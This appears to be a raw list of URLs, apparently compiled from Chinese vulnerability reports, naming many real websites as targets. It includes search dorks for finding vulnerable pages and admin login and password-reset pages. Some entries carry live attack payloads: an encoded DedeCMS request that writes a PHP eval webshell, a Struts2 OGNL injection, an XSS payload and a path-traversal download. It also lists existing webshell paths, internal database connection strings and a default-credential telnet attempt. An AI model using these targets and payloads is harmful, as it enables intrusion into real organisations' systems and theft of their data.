http://mds.music.sina.com.cn/login/login http://info.swyaoce.com/login.aspx http://www.ums86.com/ http://wenku.baidu.com/link?url=UAxsPIr3meNd8QOFLQ-UaoBPrdGbA0X5_7X-oq5QJqq9cyNFdKZGEed4T-fjmp_AABgHGBDfXj1srqkatqCCUzPRA4zjUkhNgfQRW31Mmxu http://www.ums86.com/pages/retrieveMotifyPass.jsp?spCode=101234 http://210.39.2.57/account/login.do http://www.cloud511.com/case http://www.zjrrt.com/getHelpContent.do?classId=242 http://www.ewj2009.com/getHelpContent.do?classId=13 http://www.nbzyyy.com/getHelpContent.do?classId=87 http://test.hzyibai.com/getHelpContent.do?classId=342 http://www.zjtydyf.com/getHelpContent.do?classId=288 http://leisuredak.com/getHelpContent.do?classId=82 http://www.yizheng.cc/getHelpContent.do?classId=11 http://jylbx.com/getHelpContent.do?classId=333 https://100offer.com/company_list?l=A https://tms.samsung.com.cn/SCIC_TMS/loginIndex.do inurl:class.php?class= http://hope.sdydf.gov.cn/class.php?class=1 http://www.friendshippencil.com/class.php?class=6 http://www.huadecheng.com/class.php?class=48 http://www.htfp.cn/class.php?class=6 http://www.zqyl.org.cn/class.php?class=2 http://www.shanshida.org/class.php?class=38 http://hope.sdydf.gov.cn/class.php?class=2 http://www.sdtbly.com/class.php?class=24 http://yushengyi.com/class.php?class=3 http://218.57.10.104/class.php?class=10&orderby=&page=2 http://sdzxgsdzgy.com/class.php?class=5 http://www.kuayueyingshi.com/class.php?class=16 http://xfysteel.com/class.php?class=3 http://www.netrc.org.cn/class.php?class=26 http://www.sdqlfc.com/class.php?class=21 http://www.jntsdgc.com/class.php?class=48 http://www.258home.cn/class.php?class=15 http://山东张夏-崮山地质公园.com/class.php?class=8 http://221.204.19.2/IOS/portal!manage.do http://www.gdsmd.cn/ps_show.php?id=12 www.xiaoxiaodaomin.com/space.php?do=gift&giftid=1&view=song www.xiaoxiaodaomin.com/space.php?do=anime&id=160&imgid=1&types=&view=cartoon_imagesview www.xiaoxiaodaomin.com/space.php?do=gift&order=nums&types=credit&userid=1&view=song 
www.xiaoxiaodaomin.com/space.php?do=gift&types=beans&userid=1&view=song www.xiaoxiaodaomin.com/space.php?do=pnotice&id=1 http://180.149.158.9/login_prelogin.action http://180.149.158.9/haha.jsp http://www.tsmzj.gov.cn:8012/printpage.asp?ArticleID=13423 http://www.bbsti.gov.cn/bbsti_news/Admin_Login.asp http://www.bbsti.gov.cn/bbsti_news/printpage.asp?ArticleID=51232 http://www.hbst.gov.cn/admin/ http://demo.cms.bookinge.com/install/index.php?step=5,因为这步会进行安装,重写数据库,以免给厂商带来麻烦~~ http://xx.gxufl.com:82 http://xx.gxufl.com:82/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=1
05&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 www.ahosta.gov.cn http://**.**.** http://**.**.**/login/ http://**.**.** http://www.xianyz.com/kytj/login.asp http://www.zzczj.gov.cn/ShowArticle.aspx?Id=110104000000000 http://www.zzczj.gov.cn/ShowAr http://sqlmap.org http://htfp.cn/count.php?id=2 http://htfp.cn/content.php?id=79 http://htfp.cn/class.php?class=2 http://www.china-jialifang.com/class.php?class=8 http://www.china-jialifang.com/content.php?id=4 http://www.china-jialifang.com/search.php?=88952634 http://www.china-jialifang.com/count.php?id=4 http://www.friendshippencil.com.cn/content.php?id=73 http://www.friendshippencil.com.cn/class.php?class=2 http://www.friendshippencil.com.cn/count.php?id=73 http://www.huadecheng.com/content.php?id=52 http://www.huadecheng.com/class.php?class=11 http://www.huadecheng.com/count.php?id=52 http://en.friendshippencil.com/class.php?class=2 http://en.friendshippencil.com/content.php?id=68 http://en.friendshippencil.com/count.php?id=68 http://www.xfysteel.com/class.php?class=8 http://www.xfysteel.com/content.php?id=9 http://www.xfysteel.com/count.php?id=9 http://www.zqyl.org.cn/class.php?class=1 http://www.zqyl.org.cn/content.php?id=3290 http://www.zqyl.org.cn/count.php?id=3290 http://hope.sdydf.gov.cn/class.php?class=1 http://hope.sdydf.gov.cn/count.php?id=2 http://hope.sdydf.gov.cn/content.php?id=2 http://www.dxscg.org/content.php?id=11089 http://www.dxscg.org/class.php?class=1 http://www.dxscg.org/count.php?id=11089 http://www.kuayueyingshi.com/count.php?id=71 http://www.kuayueyingshi.com/class.php?class=7 http://www.kuayueyingshi.com/content.php?id=71 http://www.s88c.com/)二次开发的PHPWEB 
http://www.yndht.com/news/class/index.php?myord=1 http://www.kmxkgc.com/news/class/index.php?myord=1 http://www.kmynf.com/news/class/index.php?myord=1 http://www.kefuan.com/news/class/index.php?myord=1 http://kmzhiyang.com/news/class/index.php?myord=1 http://www.yndimai.com/news/class/index.php?myord=1 http://www.ynyuntong.com/news/class/index.php?myord=1 http://www.123shuxue.com/news/class/index.php?myord=1 http://www.ynchengtai.com/news/class/index.php?myord=1 http://www.nvshendong.com/news/class/index.php?myord=1 http://kmdbjd.com/news/class/index.php?myord=1 http://昆明公司注册.com/news/class/index.php?myord=1 http://www.kmjunding.com/news/class/index.php?myord=1 http://wkrhy.com/news/class/index.php?myord=1 http://www.ynbkhb.com/news/class/index.php?myord=1 http://www.ynquanlan.com/news/class/index.php?myord=1 http://qjkld.com/news/class/index.php?myord=1 http://www.svnchina.com/project_open.php?order=username&rank=DESC http://geoscience.hfut.edu.cn/lab/ceshi.php?s=1 http://www1.gdufs.edu.cn/gwyjs/yjsc/articleList.php?classid=7 http://zjcq3.g.pps.tv/360bak/mj/pay/paylog.log http://zjcq3.g.pps.tv/pps/mj/pay/paylog.log http://zjcq3.g.pps.tv/pps/mj/.svn/entries http://demo.74cms.com/ inurl:showservices.asp?id= http://www.tswsj.gov.cn/admin http://www.tswsj.gov.cn/printpage.asp?ArticleID=15212 http://www.wcb.yn.gov.cn:8080/Default.aspx http://www.aqqcyp.com/products_see.asp?did=3957 http://www.aqqcyp.com/products.asp?Big=204 http://www.aqqcyp.com/news_view.asp?big=81&Id=304 http://www.aqqcyp.com/news.asp?big=81 http://www.z2hospital.com/cms/Article.aspx?NRID=18260 http://www.z2hospital.com/cms/Default.aspx http://www.z2hospital.com/cms/Article.aspx?NRID=18260 http://www.zhuqu.com/idea/55853.html?imgId=55853& http://www.zhuqu.com/idea/55853.html?imgId=55853& http://bbs.qianyun.cn/forum.php http://wooyun.org/bugs/wooyun-2014-074668 http://www.mengtianmy.com/abouts.php?id=1 http://www.bjcrmy.com/abouts.php?id=1 http://www.bjsammy.com/abouts.php?id=1 
http://www.bjgcsf.com/abouts.php?id=1 http://www.bjrxhsmy.com/abouts.php?id=1 http://www.bjjfjmy.com/abouts.php?id=1 http://www.myczmy.com/abouts.php?id=1 http://www.bjjkamy.com/abouts.php?id=1 http://www.bjdishang.com/abouts.php?id=4 http://www.bjhyfd.net/abouts.php?id=3 http://www.bjdasmc.com/abouts.php?id=1 http://www.yrstmy.com/abouts.php?id=1 http://www.sanhuanmuye.com/abouts.php?id=1 http://www.bjddhxmy.com/abouts.php?id=1 http://nbhjmy.com/abouts.php?id=1 http://www.bjafkr.com/abouts.php?id=1 http://www.ushangmm.com/abouts.php?id=3 http://www.junximuye.com/abouts.php?id=1 http://star.lvshou.com/thinkdglist/Default.aspx?NewsClass_ID=200&page=1 http://www.xplus.com/ http://e.myrb.net/www/index.php?mod=index&con=user&act=login http://news.xd56b.com/www/index.php?mod=index&con=user&act=login http://smrb.smnet.com.cn/www/index.php?mod=index&con=user&act=login http://szrb.sz-news.com.cn/www/index.php?mod=index&con=user&act=login http://epaper.hilizi.com/www/index.php?mod=index&con=user&act=login http://epaper.fzen.com.cn/www/index.php?mod=index&con=user&act=login http://www.wkdty.com/news/news_detail.php?news_id=239 http://www.kanglesoft.com/partner.php?id=2.6.6%27&version=2.6.6 http://find.cb.cnki.net/index.html cookie:AdminName=admin http://zhudizhuangshi.com/newsDetail.asp?id=10 http://szhylaw.com/newsDetail.asp?classID=3&id=76 http://www.haoshilaijz.com/newsDetail.asp?id=9 http://www.bjshijishunye.com/NewsDetail.asp?id=26 http://www.china-nfgk.com/newsDetail.asp?id=86 http://www.szkaiping.com/newsDetail.asp?id=56 http://www.elevbalanced.com/newsDetail.asp?id=52 http://www.szxysnhj.com/newsDetail.asp?id=21 http://www.cnlinson.com/newsDetail.asp?id=71 http://www.szlijin.com/newsDetail.asp?id=54 http://jwc.jnu.edu.cn/Result.asp http://www.infosea.com.cn/yonghu.html(有点吓人) http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp 
http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://www.xxxxx.com:port/theme/2009/login_port.asp http://www.fjhi.gov.cn/templates/download.jsp?path=download.jsp http://www.izhancms.com/ http://demo9.izhancms.com/content/Content/index/id/10伪静态?果断还原,如下:http://demo9.izhancms.com/content/Content/index?id=10 http://www.zving.com/ http://szxiexie.com/ http://www.0512wld.com/caseDetail.asp?classID=2&id=1 http://szhylaw.com/caseDetail.asp?classID=2&id=1 http://www.youyazx.com/caseDetail.asp?id=10 http://csbrick.com/caseDetail.asp?id=23 http://www.szdingzhu.com/caseDetail.asp?id=53 http://rambo8.com/caseDetail.asp?id=2 http://www.bjshijishunye.com/caseDetail.asp?id=1 http://www.youyazx.com/caseDetail.asp?id=1 http://www.shentongjx.com/honorDetail.asp?id=26 http://www.sz-yxsbaz.com/honorDetail.asp?id=14 http://www.0512wld.com/honorDetail.asp?id=14 http://www.0512wld.com/service.asp?classid=9 http://www.t-color.com.cn/service.asp?classid=1 http://www.kouchijz.com/childrendetail.asp?id=16 http://szhylaw.com/childrenDetail.asp?classID=1&id=21 http://zhudizhuangshi.com/newsDetail.asp?id=10 http://szhylaw.com/newsDetail.asp?classID=3&id=76 http://www.haoshilaijz.com/newsDetail.asp?id=9 http://www.bjshijishunye.com/NewsDetail.asp?id=26 http://www.china-nfgk.com/newsDetail.asp?id=86 http://www.szkaiping.com/newsDetail.asp?id=56 http://www.elevbalanced.com/newsDetail.asp?id=52 http://www.szxysnhj.com/newsDetail.asp?id=21 http://www.cnlinson.com/newsDetail.asp?id=71 http://www.szlijin.com/newsDetail.asp?id=54 http://szhylaw.com http://center.smesd.gov.cn/site/guanlizixun/companyview.jsp?id=2764一跑就知道 http://js.189.cn/emall/ http://3gdr.yn.189.cn/ http://211.100.37.152/imagetext/writting-list.do http://find.cb.cnki.net/index.html http://find.cb.cnki.net/index.html www.rsks.sdrs.gov.cn时nslookup了一下,得到地址218.56.49.7,查看218.56.49.1开放23号端口,尝试默认用户名admin https://ebank.bankofbeijing.com.cn/bccbpb/downloadBJCA/bjcaotp.exe 
http://www.17ugo.com/user.php?act=order_detail&no=719830&flag=1 http://www.17ugo.com/user.php?act=order_detail&no=719811&flag=1 http://www.17ugo.com/user.php?act=order_detail&no=11&flag=1 http://ycjg.jsfda.gov.cn/openfireweb/ http://www.szzel.com/product.asp http://www.yunyvision.com/case.asp http://www.yunyvision.com/case.asp www.szzel.com/ www.shcwine.com www.yunyvision.com www.xiangshanmall.com www.cipon.net www.qmgg.com.cn www.oulang.net www.asieris.cn www.lemsz.com www.sunrous.com www.jsyl155.com www.sz-sjbx68.com www.txjybg.com www.szwsxn.com www.szxyyt.com www.txbjnjb.com http://210.45.192.200/这个服务器上面, http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp"method=post http://www.nenter.com.cn/newsdetail.php?id=16 http://www.hbaoge.com/newsdetail.php?id=1 http://www.sun-chem.com/newsdetail.php?id=5 http://www.borui-chem.com/newsdetail.php?id=4 http://www.ahknchem.com/newsdetail.php?id=1 http://www.ablexn-chem.com/newsdetail.php?id=2 http://www.shhcchem.com/newsdetail.php?id=102 http://www.huiqianchem.com/newsdetail.php?id=1 http://www.dlanchem.com/newsdetail.php?id=15 http://www.hongrunchem.net/newsdetail.php?id=1 http://www.coolbiotech.com/newsdetail.php?id=2 http://www.checopharma.com/newsdetail.php?id=1 http://www.hfnhsw.com/newsdetail.php?id=4 http://117.79.153.227/newsdetail.php?id=1 http://www.crstpharma.com/newsdetail.php?id=1 http://www.woyouchem.com/newsdetail.php?id=1 http://portal.taijiang.gov.cn/ http://www.yy8080120.com/html/SearchList.aspx?txtTitle=1 http://www.aisida.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.djdsh.com/cp1.php?sid=3 http://www.ykzdsy.com/cp1.php?sid=20 http://www.typump.com/cp1.php?sid=7 http://www.bena-china.com/cp1.php?sid=2 http://www.dsqzxyy.com/cp1.php?sid=3 http://www.ykqyjt.com/cp1.php?sid=11 http://www.ningfeng.net/cp1.php?sid=7 
http://www.ykyly.com/cp1.php?sid=3 http://www.ykytsh.com/cp1.php?sid=5 http://www.gl-piano.com/cp1.php?sid=14 http://www.ykycdz.com/cp1.php?sid=5 http://www.ykyyqh.com/cp1.php?sid=2 http://www.ykshydl.com/cp1.php?sid=16 http://www.pjgl.com/cp1.php?sid=6 http://www.gjjmy.cn/cp1.php?sid=38 http://www.ykdayou.com/cp1.php?sid=8 http://www.ykdhh.com/cp1.php?sid=19 http://www.ykhyqb.com/cp1.php?sid=3 http://huodong.hiwifi.com/hiservice/default/lottery https://wb.chsi.com.cn/apply/res.jsp?bmh=420498202 http://www.maipu.cn/productmes.aspx?id=2266 https://url/system/maintenance/export.php?type=sc https://122.224.165.114/login.html https://119.4.164.42/login.html https://61.143.203.86/login.html http://www.gzyongtuo.com/ inurl:Product.php?ClassID= http://www.xxxxxx.com/ytadmin/login.php http://www.byshanfang.com/Product.php?ClassID=2 http://www.chjunhui.com/Product.php?ClassID=9 http://www.gzchangrun.com/Product.php?ClassID=4 http://www.gz-hongwei.com/product.php?ClassID=4 http://gdwqgovcn.gotoip3.com/Product.php?ClassID=2&page=2 http://www.chshuxie.com/product.php?nid=6 http://www.chdigao.com/Product.php?ClassID=3 http://www.chjingang.com/Product.php?ClassID=1 http://www.gzsongxiang.com/Product.php?ClassID=1 http://www.chbsxc.cn/Product.php?ClassID=6 http://gdwqbg.cn/Product.php?ClassID=5 http://gdwqbg.com/Product.php?ClassID=3 http://www.huibang88.com/Product.php?ClassID=2 http://www.byshanfang.com/ShowPro.php?id=65 http://www.chjunhui.com/ShowPro.php?id=2 http://www.conghuakx.com/showpro.php?id=26 http://www.chjingang.com/ShowPro.php?id=21 http://www.gzsongxiang.com/ShowPro.php?id=41 http://www.chbsxc.cn/ShowPro.php?id=7 http://www.qiaotour.com/ShowPro.php?id=404 http://www.huibang88.com/ShowPro.php?id=46 http://www.huibang88.com/ShowPro.php?id=46 http://www.gzchangrun.com/Product.php?ClassID=4 http://wooyun.org/bugs/wooyun-2014-079654 http://bbs.5173.com/admin.php http://www.msxl.pte.sh.cn/ http://www.msxl.pte.sh.cn/webschool/MySpace/ http://www.hiidc.net/ 
inurl:wz_show.asp?NewsId= inurl:wz_show.asp?NewsId= http://www.gxhbj.gov.cn/wz_show.asp?NewsId=4020 http://www.gzcgj.com.cn/wz_show.asp?NewsID=9076 http://gzzyy.hiidc.net/wz_show.asp?NewsId=4213 www.jxsgzszyy.cn/wz_show.asp?NewsId=4321 http://www.hydbw.com/wz_show.asp?NewsID=7502 http://www.txcm.com.cn/wz_show.asp?NewsId=4677 http://www.xtsqw.com/wz_show.asp?NewsId=4825 http://www.gzswx.org/wz_show.asp?NewsID=4630 http://www.gemeizs.com/wz_show.asp?NewsId=4419 http://hainanrfb.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://job.hfuu.edu.cn/ http://job.hfuu.edu.cn//batch.common.php?action=modelquote&cid=1&name=spacecomments http://blog.czdj.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://life.qibosoft.com/coupon/s.php http://t.nmgtv.cn/ss/batch.common.php?action=modelquote&cid=1&name=spacecomments http://aero-mech.tongji.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://xcb.cqu.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.ccsfu.edu.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.jgxt.gov.cn/admin/login.aspx inurl:vipchat filetype:jsp http://dd.xdcms.cn http://dd.xdcms.cn/index.php?m=member&c=order&f=order_show&id=109 http://www.grad.ldu.edu.cn/bigclass.asp?bigclassname=%E5%AD%A6%E7%A7%91%E5%BB%BA%E8%AE%BE&BigClassType=1 http://www.xxgk.fy.gov.cn/News_xxgktl.asp?d_id=85 http://www.qdjtx.com/job.php?mode=detail&id=4 http://www.xdl-china.com/job.php?mode=detail&id=5 http://www.aoshihr.com/job.php?mode=detail&id=20 http://www.qdxcfj.com/job.php?mode=detail&id=2 http://www.shanhaitian.com/job.php?mode=detail&id=6 http://www.qingyuan7.com/job.php?mode=detail&id=8 http://www.qdjiarun.net/job.php?mode=detail&id=3 http://www.springmagnet.com/job.php?mode=detail&id=15 http://www.haizhoutd.com/job.php?act=detail&id=2 http://www.qdaobo.cn/job.php?mode=detail&id=5 http://www.qdhzy.com/job.php?mode=detail&id=2 
http://www.qingdaozhongzhixin.com/zhongxin/job.php?mode=detail&id=3 http://www.water-green.com/job.php?act=detail&id=16 http://www.haohexinxing.com/job.php?act=detail&id=2 http://www.qdkqwy.com/job.php?action=detail&id=26 http://www.ykghjc.com/cp.php?sid=7 http://www.ykpf.com/cp.php?sid=5 http://www.dsqzxyy.com/cp.php?sid=4 http://www.htcopipe.com/cn/cp.php?sid=12 http://www.kzsny.com/lsnysfx/cp.php?sid=1 http://www.ykard.com/cp.php?sid=3 http://www.byqzxyy.com/cp.php?sid=5 http://www.jzbyk.com/cp.php?sid=11 http://ykchjd.com/cp.php?sid=5 http://www.yk148.com/qzlx/cp.php?sid=13 http://www.ykpipe.com/cp.php?sid=5 http://www.silbermannpiano.cn/cp.php?sid=4 http://www.bohai-machine.com/cn/cp.php?sid=89 http://www.yktcm.com/cp.php?sid=2 http://www.yingli.cc/cn/cp.php?sid=8 http://www.ykzdsy.com/cp.php?sid=14 http://www.ykqyjt.com/cp.php?sid=6 http://www.ykrunda.com/cp.php?sid=1 http://www.yklhlc.com/cp.php?sid=5 http://www.yxdqm.com/cp.php?sid=17 http://www.0769net.com/index.html http://www.95c.com.cn/ http://demo.95c.com.cn http://work.ch.gongchang.com/product/index/del http://www.cfsafety.gov.cn/e/admin/index.aspx http://www.youngpeak.com.cn/ http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE001 http://im.sina.com.cn/report.php?fid=4c96bc94d582b&token=xTbWzvB1&filename=111%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C!-- http://www.eyeinn.com/ http://www.luopan.cn/partner-category-grouppms http://www.ltt-hna.com/Index/PasswordBack.aspx http://xxgk.jinan.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt http://www.wintour.cn/ http://www.skyland-hotel.com/ http://www.holliyardhotel.com/ http://www.chinagongshe.com/ http://www.lyhotspring.com/ http://www.tfsunshinehotel.com/ http://www.singwood.com.cn/ http://www.rhgresorts.com/ http://www.btghotels.com/ http://www.hotelsjianguo.com/ http://www.dytchengdu.com/ http://www.baronyhotels.com/ http://www.ouyahotels.com/ 
http://www.hnsunshinegroup.com/ http://cndhotels.com/ http://www.gdhhotels.com/ http://www.dolton-hotels.com/ http://www.aoyuanhealthhotel.com/ http://www.krdhotel.com/ www.eversunshinehotel.com/ http://www.kuntairoyalhotel.com/ http://www.oceanhotel.com.cn/ http://www.mandarinhotelgd.com/get_password.html http://www.xingdingan.com/get_password.html http://www.sanyabarry.com/get_password.html http://www.aoyuanhealthhotel.net/special_offer_3.html http://www.mqjgz.cn/get_password.html http://www.ksnewporthotel.com/get_password.html http://mandarin-hotel.com.cn/get_password.html http://hy.yingwu.com.cn/get_password.html http://www.ebdh-hotel.com/get_password.html http://www.joyahotel.com.cn/get_password.html http://www.eco-hotel.com.cn/get_password.html http://www.easelandhotel.com/get_password.html http://www.aihotel.com/get_password.html http://www.guishanhotel.com/get_password.html http://www.ramadaplazagz.com/get_password.html http://www.qsshotel.com/get_password.html http://www.bwmayflowers.com.cn/get_password.html http://www.happiness-hotel.com/ http://www.glamorhotel.com/get_password.html http://www.baohonghotel.com/get_password.html http://www.wuzhishanyatai.com/get_password.html http://www.vilihotel.com/get_password.html http://www.lndfhotel-sh.com/get_password.html http://www.hainanyataihotel.com/get_password.html http://www.jbstel.com/get_password.html http://www.87198677.com/get_password.html http://www.margaretresort.com/get_password.html http://www.wenfenghotel.com/get_password.html http://www.ytxml.com/get_password.html http://www.hbdlds.com/get_password.html http://www.lzshotel.com/get_password.html http://www.gdyutonghotel.com/get_password.html http://www.jinyanhotspring.com/login.html http://www.sdlyfl.com/get_password.html http://www.xn--cerp49b31r6wv.com/member_forget.html http://www.phoenixcne.de/important_news_content.php?news_id=133837 http://www.phoenixcne.de/myadmin/login.php http://yfzx.hicc.cn/getDetails.action 
http://cfcs.org.cn/zh/index.action http://www.able-elec.com/ http://218.241.222.230/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.hnist.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://biz.sandau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://gxk.scu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://www9.xjmu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://sducc.sandau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.sppc.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.sus.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://course.hzau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://course.ujn.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://202.194.131.160/G2S/AdminSpace/QE/AddCustomForm.aspx http://ocw.sjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://116.236.150.117/G2S/AdminSpace/QE/AddCustomForm.aspx http://wlkc.forestpolice.net/G2S/AdminSpace/QE/AddCustomForm.aspx http://202.201.224.60/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.xhu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.usst.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://220.163.113.53/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.jlu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.scu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://e-learning.ecust.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.shnu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.sjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.sbs.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://www.xxoo.com/G2S/AdminSpace/QE/AddCustomForm.aspx http://60.247.77.187/ http://drops.wooyun.org/papers/1383 http://112.91.66.72/mall/goods/help/index.html?id=3462617 http://112.91.66.72/login/verify.html?v=543b8ed9166b2 http://112.91.66.72/register/verify.html?v=543b8ed98b65d 
http://112.91.66.72/mall/goods/help.html?id=3462617&theme=v2 http://www.ssap.com.cn/member/Member_SeenData.aspx?userid=38424 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 http://www.ssap.com.cn/SKWX/Job_Show.aspx?Hr_id=112 http://www.ssap.com.cn/Shop/BookMainContent.aspx?ProductManager_Id=20121120093656 http://books.ssap.com.cn/member/Member_Homepage.aspx?userid= http://deskadmin.cctv.com/ziliaoku.php?upid=* http://shop.yinyuetai.com http://shop.yinyuetai.com/detail/304 http://123.125.203.140:9997/fapays/login.action http://123.125.203.140:9997/fapays/bjo1r.jsp http://123.125.203.140:9997/fapays/jspspy.jsp jdbc:oracle:thin:@192.168.1.186:1521:icdcdev jdbc:oracle:thin:@192.168.1.222:1521:orcl jdbc:oracle:thin:@10.0.0.12:1521:icdc http://www.hblsj.gov.cn/ShowVote.aspx?VoteID=7 http://www.hblsj.gov.cn/ShowVote.aspx?VoteID=7 http://app.spaqol.com/login.action https://yt.cfae.cn/slas/login.action https://yt.cfae.cn/slas/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 https://yt.cfae.cn/slas/test.jsp http://221.136.78.200/yyprojectaudit/login.action http://118.118.171.112:8080/ManageProject/login/login!login.action http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=a http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=a http://www.hkptg.com/shownews.php?catid=32&id=255 http://114.247.41.49/layoutAction!self.action inurl:/pmember.asp http://www.dlcxdrc.com/pmember.asp http://www.cxdrc.com/pmember.asp http://www.lncyrc.com.cn/pmember.asp http://www.lnbprsrc.com/pmember.asp 
http://www.fxrsw.cn/rencai/pmember.asp http://www.jobch263.com/pmember.asp http://site.czxh.gov.cn/job/pmember.asp http://www.lsqjy.cn/lsqjy/pmember.asp http://www.mlqgwyj.com/pmember.asp http://www.127mc.com/pmember.asp http://job0514.com/pmember.asp http://jianzhuzhuangshirc.97197.com/pmember.asp http://www.shtongda.com/pmember.asp http://www.yczjw.cn/pmember.asp http://mojurencai.48448.com/pmember.asp http://www.0857zp.com/pmember.asp http://wangluorencaiwang.99292.com/pmember.asp http://112.124.28.12/pmember.asp http://www.120hr.cn/pmember.asp http://www.cqtransit.com/xxx.php http://202.98.152.138:8153/yjsjwgl/ http://xxxx.com/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://golf.cctv.com/e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC IP:117.79.80.15进行全端口扫描,果然有许多端口开放,首先发下一些目录历遍的漏洞 http://117.79.80.15:8088/ http://117.79.80.15:18880/ ftp://117.79.80.15:16521/ http://117.79.80.15:16580/ https://mail.shenyang.com.cn/ https://mail.syprojects.gov.cn/ https://mail.syjzv.com/ https://mail.sywomen.org/ https://mail.syeic.com/ 